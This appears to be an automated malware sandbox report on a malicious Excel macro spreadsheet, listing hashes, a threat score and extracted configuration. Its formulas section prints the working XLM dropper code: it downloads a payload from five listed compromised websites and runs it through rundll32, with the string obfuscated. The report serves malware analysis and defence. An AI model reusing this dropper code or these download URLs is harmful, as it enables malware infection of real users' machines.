Overview

overview

10

Static

static

10

a107ca07d7...3.xlsm

windows7-x64

10

a107ca07d7...3.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    a107ca07d780272a9259c98f7b83ec17d6d0f0cbdad109fe229ef4cffa3da1c3

  • Size

    103KB

  • Sample

    241120-r8kbksxhja

  • MD5

    3d9b82594d86797c264e045042fcef7f

  • SHA1

    03be204ccf285c7bba3f2ed1b3d8e2d8083949da

  • SHA256

    a107ca07d780272a9259c98f7b83ec17d6d0f0cbdad109fe229ef4cffa3da1c3

  • SHA512

    3c5ddac31f92b49de9feff14c5ab59fadc83122fc4390e5006bf855b40f37048f436bceb60d579bb3f42cf4727adccd1d0393e28ce60d2720e014aa18c923988

  • SSDEEP

    3072:nHhRUVXHqu8hahYIfiQOVOveshVf4KwJQikmGox:HhRYXHrbtO8eOaDPk1ox

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://landorestates.com/wordpress/NELf96wr/

https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/

http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/

https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/

https://csinoticias.com/wp-includes/RnHjIzg/
Attributes
  • formulas

    =FORMULA() =TODO =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://landorestates.com/wordpress/NELf96wr/","..\wlw.ocx",0,0) =IF('TTGEHEHEHFHDG'!C15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://csinoticias.com/wp-includes/RnHjIzg/","..\wlw.ocx",0,0)) =IF('TTGEHEHEHFHDG'!C23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\wlw.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r")

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://landorestates.com/wordpress/NELf96wr/
xlm40.dropper

https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/
xlm40.dropper

http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/
xlm40.dropper

https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/
xlm40.dropper

https://csinoticias.com/wp-includes/RnHjIzg/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://landorestates.com/wordpress/NELf96wr/
xlm40.dropper

https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/

Targets

    • Target

      a107ca07d780272a9259c98f7b83ec17d6d0f0cbdad109fe229ef4cffa3da1c3

    • Size

      103KB

    • MD5

      3d9b82594d86797c264e045042fcef7f

    • SHA1

      03be204ccf285c7bba3f2ed1b3d8e2d8083949da

    • SHA256

      a107ca07d780272a9259c98f7b83ec17d6d0f0cbdad109fe229ef4cffa3da1c3

    • SHA512

      3c5ddac31f92b49de9feff14c5ab59fadc83122fc4390e5006bf855b40f37048f436bceb60d579bb3f42cf4727adccd1d0393e28ce60d2720e014aa18c923988

    • SSDEEP

      3072:nHhRUVXHqu8hahYIfiQOVOveshVf4KwJQikmGox:HhRYXHrbtO8eOaDPk1ox

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks